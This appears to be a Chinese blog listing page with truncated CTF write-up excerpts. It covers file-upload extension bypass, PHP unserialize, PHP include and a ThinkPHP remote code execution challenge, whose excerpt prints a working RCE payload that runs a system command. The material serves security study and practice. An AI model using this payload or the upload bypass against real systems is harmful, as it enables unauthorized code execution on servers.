CTF
Sure_lis
打马醉长安
展开
-
网络安全实验室上传关
第一题 根据题目,只能上传jpg格式的图片。可以修改后缀名达到上传效果。Burp抓包。 将此处.jpg后缀去掉,留下.php,浏览器就会默认这是一个jpg文件 第二关原理和第一关是一样的,抓包改后缀就可以。 第三关发现抓包不管用了,查看源码: 从这个JS代码能看出上传文件以符号".“来分割,也就是第一个”."后面是什么后缀浏览器就把它当作什么文件。 把两个后缀名调换位置就可以直接上传。 ...原创 2020-03-16 10:03:10 · 393 阅读 · 0 评论 -
XCTF-WEB进阶区Web_php_unserialize
打开题目是一堆源码: 主要看原创 2020-03-15 09:45:23 · 541 阅读 · 0 评论 -
XCTF-WEB进阶区php_rce
打开题目出现网页: 在网上查了TinkPHP的漏洞复现,得到payload如下: ?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 漏洞复现具体...原创 2020-03-15 09:43:41 · 283 阅读 · 0 评论 -
XCTF-WEB-Web_php_include
打开题目出现源码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> str函数对大小写敏感,考...原创 2020-03-15 09:41:41 · 607 阅读 · 0 评论 -
XCTF-WEB进阶区-PHP2
打开题目发现只有一行字: 既然没什么有用的信息就看看常见的index页面,但是发现依然没有什么有用的信息,查看忽略的phps页面,有了结果: 得到了代码,查看源码进行分析 <?php if("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit(); } $_GET[id] = urldecode($...原创 2020-03-14 17:21:53 · 137 阅读 · 0 评论 -
网络安全实验室基础关答题总结
**第一题:**key在哪里? ctrl原创 2019-12-28 19:00:07 · 617 阅读 · 0 评论 -
XCTF-web-新手区题目
自我总结用 一:view_source 一般都是先看源码。 自己就出来了。 二:get_post 用hackbar 继续 完成。 三:robots 进去发现空白,什么都没有。根据题目robots,那就来查看robots协议: 再访问 f1ag_1s_h3re.php 完成。 四:backup 先来看常见的文件名后缀:常见的备份文件后缀名有.git、.svn、.swp、.~、.bak、.bash_...原创 2019-11-04 13:36:17 · 962 阅读 · 0 评论